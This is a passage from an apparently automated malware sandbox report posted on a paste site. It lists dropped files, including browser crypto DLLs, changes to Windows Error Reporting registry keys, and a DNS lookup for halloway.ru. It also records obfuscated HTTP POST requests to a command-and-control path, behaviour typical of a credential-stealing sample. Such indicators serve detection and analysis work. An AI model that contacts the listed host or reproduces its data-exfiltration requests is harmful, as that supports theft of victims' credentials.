- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_684a838e51e48080132287983dfebb23.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAD9D.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAD9D.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB2ED.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB2ED.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB2FE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB2FE.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD4F.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD4F.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_d697f373bbbe97ee18cb841f54ca9c42c7e4438_cab_0abd4007\\Report.wer.tmp",
- "C:\\Windows\\Temp\\WERA0E1.tmp",
- "C:\\Windows\\Temp\\WERA0E1.tmp.appcompat.txt",
- "C:\\Windows\\Temp\\WERA18E.tmp",
- "C:\\Windows\\Temp\\WERA18E.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\Temp\\WERA325.tmp",
- "C:\\Windows\\Temp\\WERA325.tmp.hdmp",
- "C:\\Windows\\Temp\\WERAAE7.tmp",
- "C:\\Windows\\Temp\\WERAAE7.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_20c2f8ed6e695f751745dd989c8de6fe28b2ab0_cab_062380c4\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "halloway.ru",
- "answers":
- "data": "47.254.215.29",
- "type": "A"
- * Domains:
- "ip": "47.254.215.29",
- "domain": "halloway.ru"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "uri": "http://halloway.ru/zedd/AZO/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "halloway.ru",
- "version": "1.1",
- "path": "/zedd/AZO/index.php",
- "data": "POST /zedd/AZO/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: halloway.ru\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://halloway.ru/zedd/AZO/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "halloway.ru",
- "version": "1.1",
- "path": "/zedd/AZO/index.php",
- "data": "POST /zedd/AZO/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: halloway.ru\r\nContent-Length: 66559\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement